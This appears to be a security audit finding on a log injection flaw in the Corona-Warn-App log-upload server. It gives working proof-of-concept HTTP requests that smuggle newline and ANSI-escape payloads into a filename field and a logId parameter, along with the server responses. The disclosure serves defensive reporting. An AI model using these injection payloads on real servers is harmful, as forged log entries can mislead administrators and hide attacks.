The cwa-log-upload server is vulnerable to a log injection attack at two individual endpoints. This enables an unauthenticated
(as well as an authenticated) attacker to violate the integrity of the cwa-log-upload server logs by injecting
arbitrary log messages. Note that this does not affected the user-supplied log file ZIP archives, but the actual server
logging output.
The injected log entries are not easily distinguishable to legitimate entries that have been appended by the cwa-logupload
server itself.
This issues could be abused for social engineering attacks on administrative personnel by injecting malicious messages
into log files. These could include false error conditions that instruct administrators to, for example, contact someone
or interact with services or systems by restarting them.
In this specific case, the endpoints /api/logs and /portal/search (which requires an authenticated portal user) are
affected.
The following screenshot shows a successfully injected log entry via the /api/logs endpoint:
POST /api/logs HTTP/1.1
Host: localhost:8085
User-Agent: curl/7.64.1
Accept: */*
Content-Type: multipart/form-data; boundary=11D989FA-25A8-4082-A4D2-703A4A27D392
Cwa-Otp: 357CC67D-3D97-4E4F-8F5B-E4730B71B4BD
Content-Length: 881
Connection: close
--11D989FA-25A8-4082-A4D2-703A4A27D392
Content-Disposition:form-data; name="file"; filename="filename.txt
[2m2021-05-07 17:10:17.277 [0;39m [32m INFO [cwa-log-upload,,] [0;39m [35m50287 [0;39m [2m--- [0;39m
,→ [2m[ main] [0;39m [36ma.c.logupload.LogUploadApplication [0;39m [2m: [0;39m Injected Log Line
Content-Type:application/zip
Content-Length: 458
PK [...]
--11D989FA-25A8-4082-A4D2-703A4A27D392--
HTTP/1.1 201
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: 0
X-Frame-Options: DENY
Content-Type: application/json
Date: Fri, 07 May 2021 15:14:58 GMT
Connection: close
Content-Length: 63
{"id":"C0B1DBCE400C8610C2FE","hash":"PthK38bUN7JLVgyyk8PmpQ=="}
The following screenshot shows a successfully injected log entry via the /portal/search endpoint, which requires an
authenticated user.
POST /portal/search HTTP/1.1
Host: localhost:8085
Accept-Encoding: gzip, deflate
Connection: close
Cache-Control: max-age=0
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Google Chrome";v="90"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
Origin: http://localhost:8085
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko)
,→ Chrome/90.0.4430.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q
,→ =0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost:8085/portal/start?
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,de;q=0.7
Cookie: JSESSIONID=0DD040DF4AD43C531993DD103AE948BE
Content-Length: 357
logId=%0a%1B%5B2m2021-05-07+17%3A10%3A17.277%1B%5B0%3B39m+%1B%5B32m+INFO+%5Bcwa-log-upload%2C%2C%5D%1B
,→ %5B0%3B39m+%1B%5B35m50287%1B%5B0%3B39m+%1B%5B2m---%1B%5B0%3B39m+%1B%5B2m%5B+++++++++++main%5D
,→ %1B%5B0%3B39m+%1B%5B36ma.c.logupload.LogUploadApplication++++++%1B%5B0%3B39m+%1B%5B2m%3A%1B%5
,→ B0%3B39m+Injected+Log+Line&_csrf=6a896d20-cdb6-42b5-bd2f-f94e49752a67
HTTP/1.1 200
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: 0
X-Frame-Options: DENY
Content-Type: text/html;charset=UTF-8
Content-Language: en-GB
Date: Fri, 07 May 2021 15:25:38 GMT
Connection: close
Content-Length: 1458
<!DOCTYPE html>
<html lang="de">
<head>
<meta charset="utf-8"/>
<meta content="default-src 'self' style-src 'unsafe-inline'" http-equiv="Content-Security-Policy">
<meta content="width=device-width, initial-scale=1.0" name="viewport"/>
<link href="/portal/static/css/cwa.css" rel="stylesheet" type="text/css"/>
<title>Corona Warn App - Log Upload</title>
<link href="/portal/static/img/c-19_logo.png" rel="icon"/>
<script src="/portal/static/js/logout.js"></script>
</head>
<body>
[...]